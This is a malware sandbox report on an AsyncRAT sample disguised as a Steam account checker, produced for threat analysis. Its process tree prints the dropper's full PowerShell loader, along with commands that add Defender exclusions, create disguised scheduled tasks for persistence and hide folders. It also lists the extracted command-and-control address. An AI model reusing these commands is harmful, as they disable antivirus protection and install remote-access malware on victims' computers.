Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20221111-es -
resource tags
-
submitted
01/01/2023, 04:29
General
-
Target
Steam Checker By abbadon/Steam Checker V0.1 By Abbadon.exe
-
Size
121KB
-
MD5
f0bfac0acff34c1e85a1fa3b63c315a6
-
SHA1
52b9ab7aa6b1836ae278da3575c5c7338f2c43b5
-
SHA256
2ddc9622baef1953e848b441d949bea26e22097149a44b04f0fa870e334c549a
-
SHA512
fd4021d4638ffb54afa237b372f92768a105cd1b1fa7a7012ca64e4bfab73c91f826191b9d07aff09bc26f170b1aea673dd9e08be5fb311708177a7ed4a7fdbc
-
SSDEEP
3072:5bCyJlgzy96ZZZZZZZZZZZZZZZZMZZZZZZZZZZvZZZZZZZZZZZZZZZZZZZZZZZZ+:5bIy9Wq
Malware Config
Extracted
asyncrat
1.0.7
C
185.81.157.169:2023
7G6ZCBCA-NJ11-YS93-65bg-CX918E7238D5
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Async RAT payload 8 IoCs
-
Executes dropped EXE 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\Steam Checker V0.1 By Abbadon.exe"C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\Steam Checker V0.1 By Abbadon.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command Add-Type -AssemblyName System.Windows.Forms Add-Type -AssemblyName Microsoft.VisualBasic [String] $Config_Path = 'C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon' + '\config\config' [String] $Tool_Path = 'C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon' + '\config\config\Rev.exe' try { if ([System.IO.File]::Exists($Config_Path + '\A1.exe') -eq $true) { [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } [String[]] $PSCommands = @('@shift /0', '@echo off', '@setlocal enableextensions', '@cd /d "%~dp0"', 'config\Config.bat') [System.Diagnostics.Process] $Proc = New-Object System.Diagnostics.Process [System.Diagnostics.ProcessStartInfo] $StartInfo = New-Object System.Diagnostics.ProcessStartInfo $StartInfo.FileName = 'cmd.exe' $StartInfo.RedirectStandardInput = $true $StartInfo.UseShellExecute = $false $StartInfo.WindowStyle = [System.Diagnostics.ProcessWindowStyle]::Hidden $StartInfo.CreateNoWindow = $true $Proc.StartInfo = $StartInfo $Proc.Start() [System.IO.StreamWriter] $SW = $Proc.StandardInput if ($SW.BaseStream.CanWrite -eq $true) { $SW.WriteLine($PSCommands[0]) $SW.WriteLine($PSCommands[1]) $SW.WriteLine($PSCommands[2]) $SW.WriteLine($PSCommands[3]) $SW.WriteLine($PSCommands[4]) } [System.Threading.Thread]::Sleep(3000) if ([System.IO.File]::Exists($Tool_Path) -eq $true) { [Byte[]] $Rev_Bytes = [System.IO.File]::ReadAllBytes($Tool_Path) [Array]::Reverse($Rev_Bytes) [System.IO.FileStream] $FS = [System.IO.File]::Create($Config_Path + '\A1.exe') $FS.Write($Rev_Bytes, 0, $Rev_Bytes.Length) $FS.Close() $FS.Dispose() [System.IO.File]::Delete($Tool_Path) [System.Diagnostics.Process]::Start($Config_Path + '\A1.exe') } } catch { }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\config\config\A1.exe"C:\Users\Admin\AppData\Local\Temp\Steam Checker By abbadon\config\config\A1.exe"3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users" -force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Microsoft\MicrosoftEdgeUpdates\EdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Microsoft\SystemUpdates\SysUpdate" /tr "C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\SystemUpdates4⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File CopyTo.PS14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C2.PS14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AEC274A8-B080-4267-9BC8-34D75233B293} S-1-5-21-1214520366-621468234-4062160515-1000:VDWSWJJD\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exeC:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exeC:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdates\MicrosoftEdgeUpdates.exe2⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
-
-
C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exeC:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exeC:\Users\Admin\AppData\Roaming\SystemUpdates\SystemUpdates.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD5492bd942c673806c4dc7d076d44a06de
SHA1ace44cc6d1f875aa1b58c2c0c51901f9c11b0221
SHA25630e04b25281b27e83652be61a8a61821730e30be65a95452c3b93a7a17333f00
SHA5128a328d28055337629823795dcc96adf1fce2dba6079ec29472b81f8b89917d6b312efc0ec566732effcbfa95ddf96848dead444900096ed71da590dd3861477f
-
Filesize
15KB
MD5492bd942c673806c4dc7d076d44a06de
SHA1ace44cc6d1f875aa1b58c2c0c51901f9c11b0221
SHA25630e04b25281b27e83652be61a8a61821730e30be65a95452c3b93a7a17333f00
SHA5128a328d28055337629823795dcc96adf1fce2dba6079ec29472b81f8b89917d6b312efc0ec566732effcbfa95ddf96848dead444900096ed71da590dd3861477f
-
Filesize
7KB
MD5ee825715e72aa9979c45f73c9f0243f6
SHA11f845e8dce92a8986baa85b0c62becef33aba679
SHA2563840b6a86caf61efc35cef040526f694f7e2f38a3e793d6eb55eead6bf5ef647
SHA512d6943577ac1871e8516c99aae29e634f659621431143070a939d4781c24fd24f5fd071fe59c510279ccf111698432480834e883f6e4130a5aed3ca0ac6f9756e
-
Filesize
7KB
MD5ee825715e72aa9979c45f73c9f0243f6
SHA11f845e8dce92a8986baa85b0c62becef33aba679
SHA2563840b6a86caf61efc35cef040526f694f7e2f38a3e793d6eb55eead6bf5ef647
SHA512d6943577ac1871e8516c99aae29e634f659621431143070a939d4781c24fd24f5fd071fe59c510279ccf111698432480834e883f6e4130a5aed3ca0ac6f9756e
-
Filesize
7KB
MD5ee825715e72aa9979c45f73c9f0243f6
SHA11f845e8dce92a8986baa85b0c62becef33aba679
SHA2563840b6a86caf61efc35cef040526f694f7e2f38a3e793d6eb55eead6bf5ef647
SHA512d6943577ac1871e8516c99aae29e634f659621431143070a939d4781c24fd24f5fd071fe59c510279ccf111698432480834e883f6e4130a5aed3ca0ac6f9756e
-
Filesize
7KB
MD5ee825715e72aa9979c45f73c9f0243f6
SHA11f845e8dce92a8986baa85b0c62becef33aba679
SHA2563840b6a86caf61efc35cef040526f694f7e2f38a3e793d6eb55eead6bf5ef647
SHA512d6943577ac1871e8516c99aae29e634f659621431143070a939d4781c24fd24f5fd071fe59c510279ccf111698432480834e883f6e4130a5aed3ca0ac6f9756e
-
Filesize
242KB
MD5640d55589c839016931890b47305d638
SHA1bf5062f9c16a3966abe3e7dbb083f539f1b38126
SHA2566dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689
SHA512da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa
-
Filesize
242KB
MD5640d55589c839016931890b47305d638
SHA1bf5062f9c16a3966abe3e7dbb083f539f1b38126
SHA2566dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689
SHA512da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa
-
Filesize
242KB
MD5640d55589c839016931890b47305d638
SHA1bf5062f9c16a3966abe3e7dbb083f539f1b38126
SHA2566dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689
SHA512da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa
-
Filesize
242KB
MD5640d55589c839016931890b47305d638
SHA1bf5062f9c16a3966abe3e7dbb083f539f1b38126
SHA2566dba74aedcdd6b0f36d2b7ea79b9c9f40fe669ac41ec0560bc67d4039279f689
SHA512da1142c340124a682f88790d06434c42e9df0ce9ebbe21920235db9de76800728f47a96aa489bf6673b426d16172664dcb4af1e1c134623d0a6eebe20fb7baaa
-
Filesize
40KB
-
Filesize
68KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
72KB
-
Filesize
68KB
-
Filesize
5.7MB
-
Filesize
680KB
-
Filesize
368KB
-
Filesize
320KB
-
Filesize
144KB
-
Filesize
68KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
40KB
-
Filesize
264KB
-
Filesize
68KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
144KB
-
Filesize
8KB